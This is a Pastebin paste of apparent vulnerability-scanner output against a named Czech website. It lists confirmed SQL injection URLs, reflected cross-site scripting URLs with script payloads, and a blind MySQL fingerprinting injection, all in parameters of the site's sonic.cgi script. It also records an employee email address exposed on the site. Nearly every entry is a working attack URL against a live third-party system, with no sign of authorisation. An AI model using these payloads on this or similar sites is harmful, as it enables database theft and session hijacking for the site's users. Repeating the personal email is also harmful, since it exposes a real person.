Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- http://web-stranky.cz/
- Boolean Based SQL Injection
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://web-stranky.cz/cgi/sonic.cgi?templ=' OR 'ns'='ns&page_include=w_reference
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: templ
- Parameter Type: Querystring
- Attack Pattern: ' OR 'ns'='ns
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://web-stranky.cz/cgi/sonic.cgi?templ=' OR 'ns'='ns&page_include=p_top_messages_history&reset=yes
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: templ
- Parameter Type: Querystring
- Attack Pattern: ' OR 'ns'='ns
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://web-stranky.cz/cgi/sonic.cgi?templ=' OR 'ns'='ns&page_include=p_top_messages_reactions&id_top_message=115436
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: templ
- Parameter Type: Querystring
- Attack Pattern: ' OR 'ns'='ns
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://web-stranky.cz/cgi/sonic.cgi?templ=' OR 'ns'='ns&page_include=p_top_messages_history&p_top_messages_stranka=2
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: templ
- Parameter Type: Querystring
- Attack Pattern: ' OR 'ns'='ns
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://web-stranky.cz/cgi/sonic.cgi?templ=w_index&page_include=' OR 'ns'='ns
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: page_include
- Parameter Type: Querystring
- Attack Pattern: ' OR 'ns'='ns
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://web-stranky.cz/cgi/sonic.cgi?templ=w_index&page_include=' OR 'ns'='ns&reset=yes
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: page_include
- Parameter Type: Querystring
- Attack Pattern: ' OR 'ns'='ns
- ||| XSS (Cross-site Scripting)
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://web-stranky.cz/cgi/sonic.cgi?templ='"--></style></script><script>alert(0x000091)</script>&page_include=w_reference
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: templ
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000091)</script>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://web-stranky.cz/cgi/sonic.cgi?templ='"--></style></script><script>alert(0x000088)</script>&page_include=p_top_messages_history&reset=yes
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: templ
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000088)</script>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://web-stranky.cz/cgi/sonic.cgi?templ='"--></style></script><script>alert(0x000102)</script>&page_include=p_top_messages_reactions&id_top_message=115436
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: templ
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000102)</script>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://web-stranky.cz/cgi/sonic.cgi?templ='"--></style></script><script>alert(0x000105)</script>&page_include=p_top_messages_history&p_top_messages_stranka=2
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: templ
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000105)</script>
- ||| MySQL Database Identified
- Severity : Information
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://web-stranky.cz/cgi/sonic.cgi?templ=-w_index'OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT CONCAT(CHAR(78),CHAR(69),CHAR(84),CHAR(83),CHAR(80),CHAR(65),CHAR(82),CHAR(75),CHAR(69),CHAR(82))),5,1)),0)=88),1,2))-- &page_include=w_reference
- Vulnerability Classifications: -
- Parameter Name: templ
- Parameter Type: Querystring
- Attack Pattern: -w_index'OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT CONCAT(CHAR(78),CHAR(69),CHAR(84),CHAR(83),CHAR(80),CHAR(65),CHAR(82),CHAR(75),CHAR(69),CHAR(82))),5,1)),0)=88),1,2))--
- ||| E-mail Address Disclosure
- Severity : Information
- Confirmation : Confirmed
- Vulnerable URL : http://web-stranky.cz/cgi/sonic.cgi?templ=w_index&page_include=w_reference
- Found E-mails: petr.vyhnalek@web-stranky.cz
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement